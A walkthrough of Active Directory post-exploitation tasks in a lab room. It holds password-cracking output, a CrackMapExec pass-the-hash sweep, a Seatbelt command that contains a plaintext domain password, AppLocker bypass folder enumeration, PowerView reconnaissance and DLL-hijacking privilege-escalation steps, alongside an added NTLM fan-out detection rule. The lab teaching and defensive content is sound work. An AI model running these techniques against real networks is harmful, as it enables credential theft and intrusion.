Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 4220.2 kH/s (0.26ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 10780672/14344385 (75.16%)
Rejected.........: 0/10780672 (0.00%)
Restore.Point....: 10776576/14344385 (75.13%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: Nov2599 -> NicoleBates3
Started: Thu Jan 27 17:01:20 2022
Stopped: Thu Jan 27 17:01:46 2022
CREDS - watamet
What domain user's credentials can we dump on S-SRV01?
What is the domain user's password that we can dump on S-SRV01?
Task 37 – Post Exploitation – Good Intentions, Courtesy of Microsoft: Part II
This room covers Pass the Hash (PtH) attacks… these have been covered before in other AD related rooms, but one handy tool that has not been touched on before is CrackMapExec (CME).
From the CrackMapExec GitHub, "CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. Built with stealth in mind, CME follows the concept of "Living off the Land": abusing built-in Active Directory features/protocols to achieve its functionality and allowing it to evade most endpoint protection/IDS/IPS solutions." We will be using only one of the many features of CME. We can pass the hash over SMB, SSH, WinRM, LDAP, or MSSQL; we recommend using SMB.
crackmapexec smb 10.200.110.0/24 -u <user> -d <domain> -H <hash>
ENUM >> CrackMapExec scanning 10.200.110.0/24 via SMB
❯ crackmapexec smb 10.200.110.0/24 -u watamet -d holo.live -H <REDACTED>
SMB 10.200.110.35 445 PC-FILESRV01 [*] Windows 10.0 Build 17763 x64 (name:PC-FILESRV01) (domain:holo.live) (signing:False) (SMBv1:False)
SMB 10.200.110.31 445 S-SRV01 [*] Windows 10.0 Build 17763 x64 (name:S-SRV01) (domain:holo.live) (signing:False) (SMBv1:False)
SMB 10.200.110.30 445 DC-SRV01 [*] Windows 10.0 Build 17763 x64 (name:DC-SRV01) (domain:holo.live) (signing:False) (SMBv1:False)
SMB 10.200.110.35 445 PC-FILESRV01 [+] holo.live\watamet <REDACTED>
SMB 10.200.110.31 445 S-SRV01 [+] holo.live\watamet <REDACTED> (Pwn3d!)
SMB 10.200.110.30 445 DC-SRV01 [+] holo.live\watamet <REDACTED>
NOTE: This room also goes over using Evil-WinRM to access PC-FILESRV01 – however this does not work in this case, as watamet does not have WinRM access to PC-FILESRV01… not sure if that was intentional or not (as the task does mention "If successfully authenticated, you should now have a working WinRM shell that you can use to execute remote commands.")
However, watamet DOES have RDP access to that box… sigh slowness…
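The blue-team view of the sweep above, as an added detection example constructed for this write-up (not part of the original, the Holo room, or CrackMapExec). A pass-the-hash logon looks like any other NTLM network logon on the receiving host (Security event 4624, logon type 3, authentication package NTLM), so the usable signal is one account authenticating to several hosts from one source address within a short window, which is exactly the pattern the three [+] lines produce. The events below are constructed sample records in the shape a SIEM exports, with the field names of the Windows event schema; the example assumes all hosts forward their Security logs centrally, and the threshold and window are tuning assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample Security 4624 records (not real lab telemetry); field names
# follow the Windows event schema. The first three mirror the sweep above: one
# account, one source address, three hosts, a couple of seconds apart.
SAMPLE_EVENTS = [
    {"TimeCreated": "2022-01-27T17:12:01", "Computer": "PC-FILESRV01", "EventID": 4624,
     "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetDomainName": "holo.live", "TargetUserName": "watamet", "IpAddress": "10.50.107.119"},
    {"TimeCreated": "2022-01-27T17:12:02", "Computer": "S-SRV01", "EventID": 4624,
     "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetDomainName": "holo.live", "TargetUserName": "watamet", "IpAddress": "10.50.107.119"},
    {"TimeCreated": "2022-01-27T17:12:03", "Computer": "DC-SRV01", "EventID": 4624,
     "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetDomainName": "holo.live", "TargetUserName": "watamet", "IpAddress": "10.50.107.119"},
    # Ordinary activity: an interactive Kerberos logon and one NTLM logon by a service account.
    {"TimeCreated": "2022-01-27T17:12:05", "Computer": "PC-FILESRV01", "EventID": 4624,
     "LogonType": 2, "AuthenticationPackageName": "Kerberos",
     "TargetDomainName": "holo.live", "TargetUserName": "watamet", "IpAddress": "127.0.0.1"},
    {"TimeCreated": "2022-01-27T17:40:00", "Computer": "S-SRV01", "EventID": 4624,
     "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetDomainName": "holo.live", "TargetUserName": "svc_backup", "IpAddress": "10.200.110.35"},
]


def _ts(event):
    return datetime.fromisoformat(event["TimeCreated"])


def ntlm_fanout(events, min_hosts=3, window=timedelta(minutes=5)):
    """One alert per (account, source) whose NTLM network logons reach at least
    `min_hosts` distinct computers inside some `window`-long span."""
    by_actor = defaultdict(list)
    for e in events:
        if (e.get("EventID") == 4624 and e.get("LogonType") == 3
                and e.get("AuthenticationPackageName", "").upper() == "NTLM"):
            key = (e["TargetDomainName"].lower(), e["TargetUserName"].lower(), e["IpAddress"])
            by_actor[key].append(e)

    alerts = []
    for (domain, user, source), evs in by_actor.items():
        evs.sort(key=_ts)
        for i, first in enumerate(evs):  # slide a window forward from each logon
            hosts = {x["Computer"] for x in evs[i:] if _ts(x) - _ts(first) <= window}
            if len(hosts) >= min_hosts:
                alerts.append({"account": domain + "\\" + user, "source": source,
                               "hosts": sorted(hosts), "first_seen": first["TimeCreated"]})
                break  # one alert per actor is enough
    return alerts


if __name__ == "__main__":
    for alert in ntlm_fanout(SAMPLE_EVENTS):
        print(alert)
```

Legitimate vulnerability scanners and backup accounts also fan out over NTLM, so in practice the rule needs an allowlist of known sources; a source address that is not a domain-joined machine, as here, is the strongest qualifier.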
FLAG - PC-FILESRV01 user.txt
What is the hostname of the remote endpoint we can authenticate to?
Task 38 – Post Exploitation – Watson left her locker open
This task covers AppLocker, a Microsoft tool to control policies that specify where users can execute programs on the machine. I will leave out the long-winded explanation (as it is all there in the task), however I will leave the link to the PowerShell script used to enumerate AppLocker, and a link to a GitHub repo with a bunch of info on AppLocker (including default bypasses).
- For a complete list of default directories to bypass AppLocker along with other techniques, check out this GitHub repo (https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md).
- To aid us in quickly identifying directories we can use to execute programs, we can use an AppLocker directory check script (https://github.com/HackLikeAPornstar/GibsonBird/blob/master/chapter4/applocker-bypas-checker.ps1).
ENUM >> applocker-bypass-checker.ps1 output
PS C:\Users\watamet\Documents> .\abc.ps1
[*] Processing folders recursively in C:\windows
[+] C:\windows\Tasks
[+] C:\windows\tracing
[+] C:\windows\System32\spool\drivers\color
[+] C:\windows\tracing\ProcessMonitor
Task 39 – Situational Awareness – So it’s just fancy malware?
This task covers the usage of Seatbelt and SharpEDRChecker to detect AV / Anti-Malware tools.
Seatbelt
- URL: https://github.com/GhostPack/Seatbelt
Seatbelt.exe -group=system will cover the scans that check for AV.
Seatbelt.exe -group=remote -computername=PC-FILESRV01 -username=holo.live\watamet -password=Nothingtoworry! would do a remote check…
SharpEDRChecker
- URL: https://github.com/PwnDexter/SharpEDRChecker
.\SharpEDRChecker.exe to run all tests.
- Results can be dependent on account access – SYSTEM accounts MAY show more information.
NOTE: The below question and answer is correct, but there was no sign of AMSI running on this machine. I did the Invoke-Mimikatz test and it did not return the usual AMSI "malicious" response (meaning it is not loaded).
What anti-malware product is employed on PC-FILESRV01?
What anti-virus product is employed on PC-FILESRV01?
Task 40 – Situational Awareness – SEATBELT CHECK!
This task further covers Seatbelt enumeration…
Seatbelt.exe all to run all checks.
I won’t include the output of this command, it’s MASSIVE!
What CLR version is installed on PC-FILESRV01?
What PowerShell version is installed on PC-FILESRV01?
What Windows build is PC-FILESRV01 running on?
Task 40 – Situational Awareness – ALL THE POWER!
This task covers enumeration with PowerView.ps1.
This tool is no longer supported but is still considered a standard for enumeration. From the PowerSploit GitHub, "PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various windows net * commands, which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality."
To use the script, we will first need to import it then run the commands that we want to enumerate the endpoint. Find syntax and a few essential commands you can use with PowerView.
Syntax: Import-Module .\PowerView.ps1
Get-NetLocalGroup
PS C:\Windows\System32\spool\drivers\color> Get-NetLocalGroup
ComputerName GroupName Comment
------------ --------- -------
PC-FILESRV01 Access Control Assistance Operators Members of this group can remotely query autho...
PC-FILESRV01 Administrators Administrators have complete and unrestricted ...
PC-FILESRV01 Backup Operators Backup Operators can override security restric...
PC-FILESRV01 Certificate Service DCOM Access Members of this group are allowed to connect t...
PC-FILESRV01 Cryptographic Operators Members are authorized to perform cryptographi...
PC-FILESRV01 Device Owners Members of this group can change system-wide s...
PC-FILESRV01 Distributed COM Users Members are allowed to launch, activate and us...
PC-FILESRV01 Event Log Readers Members of this group can read event logs from...
PC-FILESRV01 Guests Guests have the same access as members of the ...
PC-FILESRV01 Hyper-V Administrators Members of this group have complete and unrest...
PC-FILESRV01 IIS_IUSRS Built-in group used by Internet Information Se...
PC-FILESRV01 Network Configuration Operators Members in this group can have some administra...
PC-FILESRV01 Performance Log Users Members of this group may schedule logging of ...
PC-FILESRV01 Performance Monitor Users Members of this group can access performance c...
PC-FILESRV01 Power Users Power Users are included for backwards compati...
PC-FILESRV01 Print Operators Members can administer printers installed on d...
PC-FILESRV01 RDS Endpoint Servers Servers in this group run virtual machines and...
PC-FILESRV01 RDS Management Servers Servers in this group can perform routine admi...
PC-FILESRV01 RDS Remote Access Servers Servers in this group enable users of RemoteAp...
PC-FILESRV01 Remote Desktop Users Members in this group are granted the right to...
PC-FILESRV01 Remote Management Users Members of this group can access WMI resources...
PC-FILESRV01 Replicator Supports file replication in a domain
PC-FILESRV01 Storage Replica Administrators Members of this group have complete and unrest...
PC-FILESRV01 System Managed Accounts Group Members of this group are managed by the system.
PC-FILESRV01 Users Users are prevented from making accidental or ...
Get-NetLocalGroupMember -Group Administrators
PS C:\Windows\System32\spool\drivers\color> Get-NetLocalGroupMember -Group Administrators
ComputerName : PC-FILESRV01
GroupName : Administrators
MemberName : PC-FILESRV01\Administrator
SID : S-1-5-21-4241685735-4112329853-1893400299-500
IsGroup : False
IsDomain : False
ComputerName : PC-FILESRV01
GroupName : Administrators
MemberName : HOLOLIVE\Domain Admins
SID : S-1-5-21-471847105-3603022926-1728018720-512
IsGroup : True
IsDomain : True
Get-NetLoggedon
PS C:\Windows\System32\spool\drivers\color> Get-NetLoggedon
UserName : watamet
LogonDomain : HOLOLIVE
AuthDomains :
LogonServer : DC-SRV01
ComputerName : localhost
UserName : PC-FILESRV01$
LogonDomain : HOLOLIVE
AuthDomains :
LogonServer :
ComputerName : localhost
UserName : PC-FILESRV01$
LogonDomain : HOLOLIVE
AuthDomains :
LogonServer :
ComputerName : localhost
UserName : PC-FILESRV01$
LogonDomain : HOLOLIVE
AuthDomains :
LogonServer :
ComputerName : localhost
UserName : PC-FILESRV01$
LogonDomain : HOLOLIVE
AuthDomains :
LogonServer :
ComputerName : localhost
UserName : PC-FILESRV01$
LogonDomain : HOLOLIVE
AuthDomains :
LogonServer :
ComputerName : localhost
UserName : PC-FILESRV01$
LogonDomain : HOLOLIVE
AuthDomains :
LogonServer :
ComputerName : localhost
Get-DomainGPO
PS C:\Windows\System32\spool\drivers\color> Get-DomainGPO
usncreated : 5672
systemflags : -1946157056
displayname : Default Domain Policy
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}]
whenchanged : 12/31/2021 1:08:39 AM
objectclass : {top, container, groupPolicyContainer}
gpcfunctionalityversion : 2
showinadvancedviewonly : True
usnchanged : 2147368
dscorepropagationdata : {10/23/2020 1:33:58 AM, 10/22/2020 11:43:31 PM, 1/1/1601 12:00:00 AM}
name : {31B2F340-016D-11D2-945F-00C04FB984F9}
flags : 0
cn : {31B2F340-016D-11D2-945F-00C04FB984F9}
iscriticalsystemobject : True
gpcfilesyspath : \\holo.live\sysvol\holo.live\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
distinguishedname : CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=holo,DC=live
whencreated : 10/22/2020 11:41:59 PM
versionnumber : 71
instancetype : 4
objectguid : 5d03de40-73dd-48d7-8eb7-90a633113913
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=holo,DC=live
usncreated : 5675
systemflags : -1946157056
displayname : Default Domain Controllers Policy
gpcmachineextensionnames : [{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
whenchanged : 8/31/2021 4:24:11 AM
objectclass : {top, container, groupPolicyContainer}
gpcfunctionalityversion : 2
showinadvancedviewonly : True
usnchanged : 1952694
dscorepropagationdata : {10/23/2020 1:33:58 AM, 10/22/2020 11:43:31 PM, 1/1/1601 12:00:00 AM}
name : {6AC1786C-016F-11D2-945F-00C04fB984F9}
flags : 0
cn : {6AC1786C-016F-11D2-945F-00C04fB984F9}
iscriticalsystemobject : True
gpcfilesyspath : \\holo.live\sysvol\holo.live\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
distinguishedname : CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=holo,DC=live
whencreated : 10/22/2020 11:41:59 PM
versionnumber : 22
instancetype : 4
objectguid : 18a7cb1f-a6d4-4014-8e4b-8a6af2662d8a
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=holo,DC=live
Find-LocalAdminAccess
PS C:\Windows\System32\spool\drivers\color> Find-LocalAdminAccess
S-SRV01.holo.live
Task 42 – Situational Awareness – Import-Module PowerUpGreySkull.ps1
This task covers enumeration using nothing but standard PowerShell commands. Some (most?) of these have been covered in other topics and are all pretty self-explanatory; like the last task, this will simply show the output of each command listed in this task on PC-FILESRV01.
NOTE: This room seems further broken, because you cannot actually find the target scheduled task in the list. Either it doesn’t exist (I hope not!) or you need higher privileges to see it: Task Scheduler only lists the tasks the calling account has read permission on, so a task registered by another account can be invisible to watamet. Either way, the steps in the task give a big hint to run
Get-ScheduledTask -TaskPath "\Users\"
but that turns up nothing. Because of this, the example command output below that looks deeper into the Scheduled Tasks list is aimed at a random system-generated task.
PowerShell Enumeration
Get-ScheduledTask
PS C:\Windows\System32\spool\drivers\color> Get-ScheduledTask
TaskPath TaskName State
-------- -------- -----
\Microsoft\Windows\ Server Initial Configuration Task Disabled
\Microsoft\Windows\.NET Framework\ .NET Framework NGEN v4.0.30319 Ready
\Microsoft\Windows\.NET Framework\ .NET Framework NGEN v4.0.30319 64 Ready
\Microsoft\Windows\.NET Framework\ .NET Framework NGEN v4.0.30319... Disabled
\Microsoft\Windows\.NET Framework\ .NET Framework NGEN v4.0.30319... Disabled
\Microsoft\Windows\Active Directory Rights ... AD RMS Rights Policy Template ... Disabled
\Microsoft\Windows\Active Directory Rights ... AD RMS Rights Policy Template ... Ready
\Microsoft\Windows\AppID\ PolicyConverter Ready
\Microsoft\Windows\AppID\ VerifiedPublisherCertStoreCheck Ready
\Microsoft\Windows\Application Experience\ Microsoft Compatibility Appraiser Ready
\Microsoft\Windows\Application Experience\ ProgramDataUpdater Running
\Microsoft\Windows\Application Experience\ StartupAppTask Ready
\Microsoft\Windows\ApplicationData\ appuriverifierdaily Ready
\Microsoft\Windows\ApplicationData\ appuriverifierinstall Ready
\Microsoft\Windows\ApplicationData\ CleanupTemporaryState Ready
\Microsoft\Windows\ApplicationData\ DsSvcCleanup Ready
\Microsoft\Windows\AppxDeploymentClient\ Pre-staged app cleanup Disabled
\Microsoft\Windows\Autochk\ Proxy Ready
\Microsoft\Windows\BitLocker\ BitLocker Encrypt All Drives Ready
\Microsoft\Windows\BitLocker\ BitLocker MDM policy Refresh Ready
\Microsoft\Windows\Bluetooth\ UninstallDeviceTask Disabled
\Microsoft\Windows\BrokerInfrastructure\ BgTaskRegistrationMaintenanceTask Ready
\Microsoft\Windows\CertificateServicesClient\ UserTask Ready
\Microsoft\Windows\CertificateServicesClient\ UserTask-Roam Ready
\Microsoft\Windows\Chkdsk\ ProactiveScan Ready
\Microsoft\Windows\Chkdsk\ SyspartRepair Ready
\Microsoft\Windows\CloudExperienceHost\ CreateObjectTask Ready
\Microsoft\Windows\Customer Experience Impr... Consolidator Ready
\Microsoft\Windows\Customer Experience Impr... UsbCeip Ready
\Microsoft\Windows\Data Integrity Scan\ Data Integrity Scan Ready
\Microsoft\Windows\Data Integrity Scan\ Data Integrity Scan for Crash ... Ready
\Microsoft\Windows\Defrag\ ScheduledDefrag Ready
\Microsoft\Windows\Device Information\ Device Ready
\Microsoft\Windows\Diagnosis\ Scheduled Ready
\Microsoft\Windows\DirectX\ DXGIAdapterCache Ready
\Microsoft\Windows\DiskCleanup\ SilentCleanup Ready
\Microsoft\Windows\DiskDiagnostic\ Microsoft-Windows-DiskDiagnost... Disabled
\Microsoft\Windows\DiskDiagnostic\ Microsoft-Windows-DiskDiagnost... Disabled
\Microsoft\Windows\DiskFootprint\ Diagnostics Ready
\Microsoft\Windows\DiskFootprint\ StorageSense Ready
\Microsoft\Windows\EDP\ EDP App Launch Task Ready
\Microsoft\Windows\EDP\ EDP Auth Task Ready
\Microsoft\Windows\EDP\ EDP Inaccessible Credentials Task Ready
\Microsoft\Windows\EDP\ StorageCardEncryption Task Ready
\Microsoft\Windows\ExploitGuard\ ExploitGuard MDM policy Refresh Ready
\Microsoft\Windows\File Classification Infr... Property Definition Sync Disabled
\Microsoft\Windows\Flighting\FeatureConfig\ ReconcileFeatures Ready
\Microsoft\Windows\Flighting\OneSettings\ RefreshCache Ready
\Microsoft\Windows\InstallService\ ScanForUpdates Disabled
\Microsoft\Windows\InstallService\ ScanForUpdatesAsUser Disabled
\Microsoft\Windows\InstallService\ WakeUpAndContinueUpdates Disabled
\Microsoft\Windows\InstallService\ WakeUpAndScanForUpdates Disabled
\Microsoft\Windows\LanguageComponentsInstal... Installation Ready
\Microsoft\Windows\Location\ Notifications Ready
\Microsoft\Windows\Location\ WindowsActionDialog Ready
\Microsoft\Windows\Maintenance\ WinSAT Ready
\Microsoft\Windows\Maps\ MapsToastTask Disabled
\Microsoft\Windows\Maps\ MapsUpdateTask Disabled
\Microsoft\Windows\MemoryDiagnostic\ ProcessMemoryDiagnosticEvents Disabled
\Microsoft\Windows\MemoryDiagnostic\ RunFullMemoryDiagnostic Disabled
\Microsoft\Windows\Mobile Broadband Accounts\ MNO Metadata Parser Ready
\Microsoft\Windows\MUI\ LPRemove Ready
\Microsoft\Windows\Multimedia\ SystemSoundsService Disabled
\Microsoft\Windows\NetTrace\ GatherNetworkInfo Ready
\Microsoft\Windows\Offline Files\ Background Synchronization Disabled
\Microsoft\Windows\Offline Files\ Logon Synchronization Disabled
\Microsoft\Windows\PLA\ Server Manager Performance Mon... Disabled
\Microsoft\Windows\Plug and Play\ Device Install Group Policy Ready
\Microsoft\Windows\Plug and Play\ Device Install Reboot Required Ready
\Microsoft\Windows\Plug and Play\ Sysprep Generalize Drivers Ready
\Microsoft\Windows\Power Efficiency Diagnos... AnalyzeSystem Queued
\Microsoft\Windows\RecoveryEnvironment\ VerifyWinRE Disabled
\Microsoft\Windows\Registry\ RegIdleBackup Ready
\Microsoft\Windows\Server Manager\ CleanupOldPerfLogs Ready
\Microsoft\Windows\Server Manager\ ServerManager Ready
\Microsoft\Windows\Servicing\ StartComponentCleanup Ready
\Microsoft\Windows\SharedPC\ Account Cleanup Disabled
\Microsoft\Windows\Shell\ CreateObjectTask Ready
\Microsoft\Windows\Shell\ IndexerAutomaticMaintenance Ready
\Microsoft\Windows\Software Inventory Logging\ Collection Disabled
\Microsoft\Windows\Software Inventory Logging\ Configuration Ready
\Microsoft\Windows\SoftwareProtectionPlatform\ SvcRestartTaskLogon Ready
\Microsoft\Windows\SpacePort\ SpaceAgentTask Ready
\Microsoft\Windows\SpacePort\ SpaceManagerTask Ready
\Microsoft\Windows\Speech\ HeadsetButtonPress Ready
\Microsoft\Windows\Storage Tiers Management\ Storage Tiers Management Initi... Ready
\Microsoft\Windows\Storage Tiers Management\ Storage Tiers Optimization Disabled
\Microsoft\Windows\Task Manager\ Interactive Ready
\Microsoft\Windows\termsrv\RemoteFX\ RemoteFXvGPUDisableTask Ready
\Microsoft\Windows\termsrv\RemoteFX\ RemoteFXWarningTask Ready
\Microsoft\Windows\TextServicesFramework\ MsCtfMonitor Ready
\Microsoft\Windows\Time Synchronization\ ForceSynchronizeTime Ready
\Microsoft\Windows\Time Synchronization\ SynchronizeTime Ready
\Microsoft\Windows\Time Zone\ SynchronizeTimeZone Ready
\Microsoft\Windows\UPnP\ UPnPHostConfig Disabled
\Microsoft\Windows\WDI\ ResolutionHost Ready
\Microsoft\Windows\Windows Defender\ Windows Defender Cache Mainten... Ready
\Microsoft\Windows\Windows Defender\ Windows Defender Cleanup Ready
\Microsoft\Windows\Windows Defender\ Windows Defender Scheduled Scan Ready
\Microsoft\Windows\Windows Defender\ Windows Defender Verification Ready
\Microsoft\Windows\Windows Error Reporting\ QueueReporting Ready
\Microsoft\Windows\Windows Filtering Platform\ BfeOnServiceStartTypeChange Ready
\Microsoft\Windows\Windows Media Sharing\ UpdateLibrary Ready
\Microsoft\Windows\WindowsColorSystem\ Calibration Loader Ready
\Microsoft\Windows\WindowsUpdate\ Scheduled Start Ready
\Microsoft\Windows\Wininet\ CacheTask Running
\Microsoft\Windows\Workplace Join\ Automatic-Device-Join Ready
\Microsoft\Windows\Workplace Join\ Recovery-Check Disabled
Get-ScheduledTask -TaskPath "\Microsoft\Windows\Wininet\"
PS C:\Windows\System32\spool\drivers\color> Get-ScheduledTask -TaskPath "\Microsoft\Windows\Wininet\"
TaskPath TaskName State
-------- -------- -----
\Microsoft\Windows\Wininet\ CacheTask Running
Get-ScheduledTaskInfo -TaskName "\Microsoft\Windows\Wininet\CacheTask"
PS C:\Windows\System32\spool\drivers\color> Get-ScheduledTaskInfo -TaskName "\Microsoft\Windows\Wininet\CacheTask"
LastRunTime : 1/29/2022 2:09:09 AM
LastTaskResult : 267009
NextRunTime :
NumberOfMissedRuns : 0
TaskName : \Microsoft\Windows\Wininet\CacheTask
TaskPath :
PSComputerName :
whoami /priv
PS C:\Windows\System32\spool\drivers\color> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
NOTE: To add further salt to the wound, the next 3 commands, which use the ActiveDirectory module for Active Directory enumeration, do not actually work on this box. The module ships as part of the RSAT-AD-PowerShell Windows feature, which is evidently not installed on PC-FILESRV01, and installing a Windows feature requires an Administrator account; the screenshots of the command output below are therefore taken from the task itself. (The module is only a wrapper around LDAP queries, and the ADSI accelerators built into PowerShell can answer the same questions as an ordinary domain user without any module installed.)
Import-Module ActiveDirectory; Get-ADGroup
Import-Module ActiveDirectory; Get-ADGroupMember
Import-Module ActiveDirectory; Get-ADPrincipalGroupMembership
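The three module-based commands above can be reproduced without the RSAT module at all, because the LDAP access they wrap is exposed to every domain user through the System.DirectoryServices classes built into Windows PowerShell. The following is an added example written for this walkthrough; it is not part of the room or of the ActiveDirectory module. The group name Domain Admins and the user watamet are taken from the PowerView output above; everything else is generic and assumes it is run on a domain-joined host as any domain user.

```powershell
# Added example, not from the room or the ActiveDirectory module: Get-ADGroup,
# Get-ADGroupMember and Get-ADPrincipalGroupMembership equivalents built on
# System.DirectoryServices, which every Windows PowerShell ships with. Any domain
# user may read these attributes by default, so no RSAT and no admin rights needed.

function Get-AdsiSearcher {
    param([Parameter(Mandatory)][string]$Filter)
    # RootDSE tells us the default naming context, so nothing is hard-coded to DC=holo,DC=live
    $root = [ADSI]"LDAP://RootDSE"
    $base = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$($root.defaultNamingContext)")
    $s = New-Object System.DirectoryServices.DirectorySearcher($base, $Filter)
    $s.PageSize = 500          # AD caps a single unpaged result set at 1000 entries; paging gets them all
    return $s
}

function ConvertTo-LdapLiteral {
    # RFC 4515 escaping: 'Domain Admins' is harmless, but a value containing ( ) * \ or NUL
    # must not be able to change the meaning of the filter we build around it.
    param([Parameter(Mandatory)][string]$Value)
    $Value -replace '\\', '\5c' -replace '\*', '\2a' -replace '\(', '\28' -replace '\)', '\29' -replace "`0", '\00'
}

# Get-ADGroup equivalent: name, DN, SID and the security/distribution flag from groupType
function Get-DomainGroupAdsi {
    param([string]$Name = '*')
    $lit = if ($Name -eq '*') { '*' } else { ConvertTo-LdapLiteral $Name }
    $s = Get-AdsiSearcher "(&(objectCategory=group)(sAMAccountName=$lit))"
    foreach ($r in $s.FindAll()) {
        $sid = New-Object System.Security.Principal.SecurityIdentifier($r.Properties['objectsid'][0], 0)
        [pscustomobject]@{
            Name              = $r.Properties['samaccountname'][0]
            DistinguishedName = $r.Properties['distinguishedname'][0]
            SID               = $sid.Value
            # groupType bit 0x80000000 set => security group; clear => distribution group
            IsSecurityGroup   = ([int64]$r.Properties['grouptype'][0] -band 0x80000000) -ne 0
        }
    }
}

# Get-ADGroupMember equivalent. -Recursive uses LDAP_MATCHING_RULE_IN_CHAIN
# (OID 1.2.840.113556.1.4.1941) so the DC expands nested groups server-side.
# Note: memberOf never lists members whose *primary* group this is (primaryGroupID).
function Get-DomainGroupMemberAdsi {
    param([Parameter(Mandatory)][string]$GroupName, [switch]$Recursive)
    $g = @(Get-DomainGroupAdsi -Name $GroupName)[0]
    if (-not $g) { throw "group '$GroupName' not found" }
    $dn = ConvertTo-LdapLiteral $g.DistinguishedName
    $filter = if ($Recursive) { "(memberOf:1.2.840.113556.1.4.1941:=$dn)" } else { "(memberOf=$dn)" }
    foreach ($r in (Get-AdsiSearcher $filter).FindAll()) {
        $classes = @($r.Properties['objectclass'])        # last value is the most specific class
        [pscustomobject]@{
            Name  = $r.Properties['samaccountname'][0]
            Class = $classes[$classes.Count - 1]
            DN    = $r.Properties['distinguishedname'][0]
        }
    }
}

# Get-ADPrincipalGroupMembership equivalent: memberOf plus the primary group, which
# is stored only as a RID in primaryGroupID and is NOT present in memberOf.
function Get-DomainPrincipalGroupsAdsi {
    param([Parameter(Mandatory)][string]$SamAccountName)
    $r = (Get-AdsiSearcher "(sAMAccountName=$(ConvertTo-LdapLiteral $SamAccountName))").FindOne()
    if (-not $r) { throw "principal '$SamAccountName' not found" }
    $groups = [System.Collections.Generic.List[string]]::new()
    foreach ($dn in $r.Properties['memberof']) { $groups.Add($dn) }
    # Rebuild the primary group's SID from the account's domain SID and bind to it directly
    $userSid = New-Object System.Security.Principal.SecurityIdentifier($r.Properties['objectsid'][0], 0)
    $primary = [ADSI]"LDAP://<SID=$($userSid.AccountDomainSid.Value)-$($r.Properties['primarygroupid'][0])>"
    $groups.Add([string]$primary.distinguishedName)
    return $groups
}

# Usage (names from the walkthrough's output above)
Get-DomainGroupAdsi -Name 'Domain Admins'
Get-DomainGroupMemberAdsi -GroupName 'Domain Admins' -Recursive
Get-DomainPrincipalGroupsAdsi -SamAccountName 'watamet'
```

Two details matter when you trust this output: a group's primary-group members (usually everyone, via Domain Users) do not appear under memberOf, which is why the last function resolves primaryGroupID separately; and filter values are escaped per RFC 4515 so that a name you did not choose (a username from a share listing, say) cannot widen the query.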
Task 43 – Privilege Escalation – WERE TAKING OVER THIS DLL!
From the MITRE ATT&CK framework, DLL Hijacking is defined as "Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution." The ATT&CK technique ID is T1574 (Hijack Execution Flow); DLL search order hijacking specifically is sub-technique T1574.001.
To use DLL hijacking for privilege escalation, we need to research the application and its known vulnerabilities, and find a DLL that it tries to load but which is missing from the system, in a location we have write access to. The application (or the scheduled task or service that launches it) must also run with higher privileges than we hold; a hijack inside a process running as our own user gains nothing.
DLL hijacking can also be used for persistence, as we will see in the next task. That process is much easier than the previous one, as we can use process-monitoring tools such as ProcMon and Process Hacker 2 to watch which DLLs an application looks for, and where, and take over one of those locations. The persistence works by having the application load our DLL every time the system restarts or our connection is interrupted; this can be an application we put onto the system or one already present that we exploit.
Steps taken to perform DLL hijacking are outlined below.
- Identify the vulnerable application and its location
- Identify the application’s PID
- Identify vulnerable DLLs that can be hijacked (missing, or loaded from a path we can write to)
- Use MSFVenom or another payload creation tool to create a malicious DLL
- Drop the malicious DLL at the path the application searches (replacing the original only if one exists there)
- Profit
What is the name of the vulnerable application found on PC-FILESRV01?
Task 44 – Persistence – WERE TAKING OVER THIS DLL! Part: II
I have intentionally skipped showing any steps for task #43 because, in all honesty, it did not actually explain how to find the DLL without having access to SYSTEM. I instead copied kavremover.exe to my own development Win 10 VM and ran ProcMon on it to find the DLL we were supposed to use for privilege escalation (see below for why this was not worthwhile); for the same reason, using it for persistence was also irrelevant.
Using ProcMon to find exploitable DLLs
- First, run ProcMon.exe – you will be presented with a window like below:
- Minimize ProcMon and then start up kavremover.exe – it will require Administrator access. Accept the agreement and you will land on a screen like below – you can now close the app by pressing the Exit button… we have captured what we need!
- Now we return to ProcMon. To filter the list, go to Filter -> Filter in the top menu to open the Process Monitor Filter window:
- The first filter we will apply is Process Name that ends with kavremover.exe:
- Then we will set a filter for Path that ends with .dll:
